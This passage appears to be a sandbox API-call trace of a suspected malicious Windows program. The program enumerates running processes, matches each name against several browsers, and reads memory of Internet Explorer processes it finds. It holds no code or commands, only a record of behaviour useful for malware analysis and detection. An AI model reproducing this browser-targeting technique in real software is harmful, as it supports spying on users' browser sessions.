	[0196.590] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0196.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1204
	[0196.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.591] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0196.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.591] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.591] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0196.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.591] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.598] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0196.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1208
	[0196.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.599] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.599] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.600] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.600] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.600] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0196.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x120c
	[0196.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.601] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0196.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.601] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.601] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0196.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.602] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.602] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0196.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0196.603] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0196.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1210
	[0196.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.603] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0196.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.604] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.605] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0196.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.605] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.606] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0196.606] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1214
	[0196.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.606] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0196.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.607] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.607] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0196.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.607] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.607] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0196.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1218
	[0196.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.608] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0196.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.609] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.609] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0196.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.609] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.609] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0196.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x121c
	[0196.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.610] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0196.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.611] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.611] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0196.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.611] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.611] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0196.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1220
	[0196.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.612] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0196.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.613] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.613] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0196.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.614] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.614] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0196.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1224
	[0196.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.615] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0196.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.615] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.615] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0196.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.616] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.616] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0196.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1228
	[0196.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.617] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0196.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.617] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.617] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0196.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.618] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.618] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0196.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x122c
	[0196.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.619] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0196.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.619] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.620] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0196.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.620] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.621] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0196.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1230
	[0196.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.621] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0196.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.622] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.622] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0196.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.622] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.622] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0196.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1234
	[0196.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.623] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0196.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.624] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.624] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0196.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.624] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.624] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0196.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1238
	[0196.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.625] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0196.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.626] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.626] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0196.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.626] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.627] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0196.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x123c
	[0196.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.627] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0196.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.628] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.629] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0196.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.629] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.630] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0196.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1240
	[0196.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.630] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0196.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.631] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.631] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0196.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.632] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.632] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0196.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1244
	[0196.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.633] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0196.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.634] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.634] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0196.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.635] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.635] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0196.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1248
	[0196.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.636] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0196.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.637] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.637] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0196.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.637] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.638] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x124c
	[0196.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.674] NtQueryInformationProcess (in: ProcessHandle=0x124c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.674] ReadProcessMemory (in: hProcess=0x124c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.674] ReadProcessMemory (in: hProcess=0x124c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.674] ReadProcessMemory (in: hProcess=0x124c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.674] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.674] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1250
	[0196.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.675] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.675] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.675] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.676] NtQueryInformationProcess (in: ProcessHandle=0x1250, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.676] ReadProcessMemory (in: hProcess=0x1250, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.676] ReadProcessMemory (in: hProcess=0x1250, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.676] ReadProcessMemory (in: hProcess=0x1250, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.676] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.676] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1254
	[0196.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.677] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.677] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.678] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.678] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0196.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1258
	[0196.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.679] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0196.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.679] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.680] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0196.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.680] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x125c
	[0196.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
